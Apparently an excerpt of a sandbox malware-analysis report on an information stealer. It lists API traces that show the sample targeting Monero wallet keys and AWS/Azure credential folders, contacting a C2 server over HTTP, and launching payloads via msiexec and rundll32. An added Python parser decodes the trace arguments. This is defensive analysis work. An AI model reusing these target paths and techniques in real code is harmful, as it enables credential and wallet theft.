                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: df72a0d672ec4fb11c24d4aa2f2ab45ad9b8f4debb5efd89f929463c97b0e4b8
                          • Instruction ID: 7c103a9de59f5dffe6200b358e309cd08e46704c9557666e29118cd6521a392d
                          • Opcode Fuzzy Hash: df72a0d672ec4fb11c24d4aa2f2ab45ad9b8f4debb5efd89f929463c97b0e4b8
                          • Instruction Fuzzy Hash: FE12EF72921128ABDB15EBA0EC96FEEB378BF94700F504199F10673095EF702A49CF65
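The "APIs" lines of this report are a compact trace format: an optional "Part of subcall function <addr>:" prefix, API.MODULE(args) with each argument either an eight-digit hex immediate or "?" when the value could not be resolved, and the "ref:" call-site address. Several arguments in the C2 routine above are fixed by the Win32 prototype and can be read directly: InternetOpenA's dwAccessType of 00000001 is INTERNET_OPEN_TYPE_DIRECT (system proxy settings are bypassed), InternetConnectA's dwService of 00000003 is INTERNET_SERVICE_HTTP, HttpOpenRequestA's dwFlags of 00400100 is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE with INTERNET_FLAG_SECURE absent (so this request is plain HTTP), and InternetReadFile drains the response 0xC7 (199) bytes per call. The verb at 010509A0 and the object name are heap addresses of strings decrypted at runtime, so the HTTP method and path are not recoverable from this listing; the "------" and quote strings in the String ID are consistent with a multipart form body but the trace does not show it being built. The Python below is an added example, not code from the report or the sample, that parses lines copied from this listing into structured calls and annotates those fixed-meaning arguments; the flag table covers the commonly used INTERNET_FLAG_* constants only, so unknown bits are reported as a hex remainder.

```python
"""Parser for Joe Sandbox 'APIs' trace lines with WinINet argument decoding.

Added example, not part of the report or the sample. TRACE_LINES below are
copied verbatim from the C2 routine's listing; everything else is constructed.
"""
import re
from typing import NamedTuple, Optional

TRACE_LINES = [
    "  • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849",
    "• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009159F8",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915B93",
    "• HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00915BF8",
    "• InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00915F4C",
    "• wsprintfA.USER32 ref: 00928459",
]


class ApiCall(NamedTuple):
    api: str
    module: str
    args: tuple            # int for hex immediates, None for '?', str for literals
    ref: int               # call-site address from 'ref:'
    caller: Optional[int]  # set on 'Part of subcall function' lines


_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def _arg(tok: str):
    """'?' -> None, 8-digit hex (optionally negative) -> int, anything else literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_trace(lines) -> list:
    """Structured calls from trace lines; headings and non-matching lines are skipped."""
    calls = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(_arg(t) for t in raw.split(",")) if raw else ()
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), caller))
    return calls


# Commonly used WinINet request flags (wininet.h); not an exhaustive list.
WININET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}


def decode_flags(value: int, table: dict) -> list:
    """Bit names in table order; unknown bits are kept as a single hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known & 0xFFFFFFFF
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def _int_arg(call: ApiCall, idx: int) -> Optional[int]:
    return call.args[idx] if idx < len(call.args) and isinstance(call.args[idx], int) else None


def describe(call: ApiCall) -> str:
    """Annotate arguments whose meaning is fixed by the Win32 prototype; '' otherwise."""
    if call.api == "InternetOpenA" and (v := _int_arg(call, 1)) is not None:
        return "dwAccessType=" + OPEN_TYPES.get(v, f"0x{v:08X}")
    if call.api == "InternetConnectA" and (v := _int_arg(call, 5)) is not None:
        return "nService=" + SERVICES.get(v, f"0x{v:08X}")
    if call.api == "HttpOpenRequestA" and (v := _int_arg(call, 6)) is not None:
        return "dwFlags=" + "|".join(decode_flags(v, WININET_FLAGS))
    if call.api == "InternetReadFile" and (v := _int_arg(call, 2)) is not None:
        return f"dwNumberOfBytesToRead={v}"
    return ""


if __name__ == "__main__":
    for c in parse_trace(TRACE_LINES):
        print(f"{c.ref:08X} {c.api}.{c.module} {describe(c)}")
```

The same parser applies to every "APIs" block in this report; feeding it the whole listing and grouping by the ref address is a quick way to recover the call graph implied by the "Part of subcall function" prefixes.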
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0091D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D208
                          • lstrcat.KERNEL32(?,00931478), ref: 0091D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D22A
                          • lstrcat.KERNEL32(?,0093147C), ref: 0091D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D24C
                          • lstrcat.KERNEL32(?,00931480), ref: 0091D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D26E
                          • lstrcat.KERNEL32(?,00931484), ref: 0091D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D290
                          • lstrcat.KERNEL32(?,00931488), ref: 0091D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D2B2
                          • lstrcat.KERNEL32(?,0093148C), ref: 0091D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D2D4
                          • lstrcat.KERNEL32(?,00931490), ref: 0091D2E3
                            • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                            • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                          • lstrlen.KERNEL32(?), ref: 0091D32A
                          • lstrlen.KERNEL32(?), ref: 0091D339
                            • Part of subcall function 0092AA70: StrCmpCA.SHLWAPI(01049ED8,0091A7A7,?,0091A7A7,01049ED8), ref: 0092AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0091D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 345c2ac3fe5a87165e11055102dfd11daa4cc0448efd7ade0fa6db1a1f6372d7
                          • Instruction ID: e625975592d2bb82614feec4c59a5a0d99e1038bb435898609380b20066e7982
                          • Opcode Fuzzy Hash: 345c2ac3fe5a87165e11055102dfd11daa4cc0448efd7ade0fa6db1a1f6372d7
                          • Instruction Fuzzy Hash: B2E1FD72910218ABCB04FBA0ED96FEE7379BF94301F104158F106B70A5DE35AE49CB66
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0104F3D0,00000000,?,0093144C,00000000,?,?), ref: 0091CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0091CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0091CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0091CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0091CAD9
                          • StrStrA.SHLWAPI(?,0104F550,00930B52), ref: 0091CAF7
                          • StrStrA.SHLWAPI(00000000,0104F4F0), ref: 0091CB1E
                          • StrStrA.SHLWAPI(?,0104F6C0,00000000,?,00931458,00000000,?,00000000,00000000,?,01049FA8,00000000,?,00931454,00000000,?), ref: 0091CCA2
                          • StrStrA.SHLWAPI(00000000,0104F6E0), ref: 0091CCB9
                            • Part of subcall function 0091C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                            • Part of subcall function 0091C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                          • StrStrA.SHLWAPI(?,0104F6E0,00000000,?,0093145C,00000000,?,00000000,01049FC8), ref: 0091CD5A
                          • StrStrA.SHLWAPI(00000000,01049DA8), ref: 0091CD71
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                          • lstrlen.KERNEL32(00000000), ref: 0091CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0091CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 5e63aafec3fe86ed573c21468683122e30289788821b2c8c776773caed9aa319
                          • Instruction ID: e71bac032e6be8df0cd34362cd23ec7c5af53517edf72c21e8db31480f484583
                          • Opcode Fuzzy Hash: 5e63aafec3fe86ed573c21468683122e30289788821b2c8c776773caed9aa319
                          • Instruction Fuzzy Hash: D4E1F072D10118ABDB14EBA4EC96FEEB778AF98300F404159F10677196EF306A4ACF65
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0104C288,00000000,00020019,00000000,009305B6), ref: 009283A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                          • wsprintfA.USER32 ref: 00928459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                          • Instruction ID: a8df89ca92a4e5d2c8b96ac70b5115b0c6ed458a73fdc51eb5f1e5ba233a293c
                          • Opcode Fuzzy Hash: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                          • Instruction Fuzzy Hash: F6812B72911228ABDB24DB50DC91FEAB7B8BF48700F0086D8E109A7184DF756F85CFA5
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00924DCD
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                            • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                          • lstrcat.KERNEL32(?,00000000), ref: 00924E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00924E59
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                            • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                            • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00924EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00924EE5
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249B0
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,009308D2), ref: 009249C5
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249E2
                            • Part of subcall function 00924910: PathMatchSpecA.SHLWAPI(?,?), ref: 00924A1E
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,01050A30), ref: 00924A4A
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FF8), ref: 00924A5C
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A70
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FFC), ref: 00924A82
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A96
                            • Part of subcall function 00924910: CopyFileA.KERNEL32(?,?,00000001), ref: 00924AAC
                            • Part of subcall function 00924910: DeleteFileA.KERNEL32(?), ref: 00924B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 90c13f1b4fe9b57622eea7ada647627ab38918e58069b35029d72c5c5a7abbd2
                          • Instruction ID: 8223a6847fe7036e0d7c15e19fb0e197dc1391e7711566178379c69a1a582e6a
                          • Opcode Fuzzy Hash: 90c13f1b4fe9b57622eea7ada647627ab38918e58069b35029d72c5c5a7abbd2
                          • Instruction Fuzzy Hash: C541947AA4021867D714F760EC47FED3338ABA4704F404594B649660C5EEF56BC98F92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0092906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                          • Instruction ID: 7c36494abd805e67270bb53652853983376242324ad5822cb9e3a4ea1db48ec4
                          • Opcode Fuzzy Hash: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                          • Instruction Fuzzy Hash: 2B71FC71A10208ABDB04DFE4DC89FEEB7B9BF88701F108648F615A7294DF74A945CB61
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 009231C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0092335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 009234EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                          • Instruction ID: b4ab002048f3a420275d93faced2fea864aee9aeaf85ccae5f6b183e598b69d0
                          • Opcode Fuzzy Hash: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                          • Instruction Fuzzy Hash: 311213728001289BDB19FBA0EC92FDEB738AF94300F504559F5067619AEF342B4ACF56
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                            • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                            • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                            • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                            • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                            • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                          • lstrlen.KERNEL32(00000000), ref: 0092532F
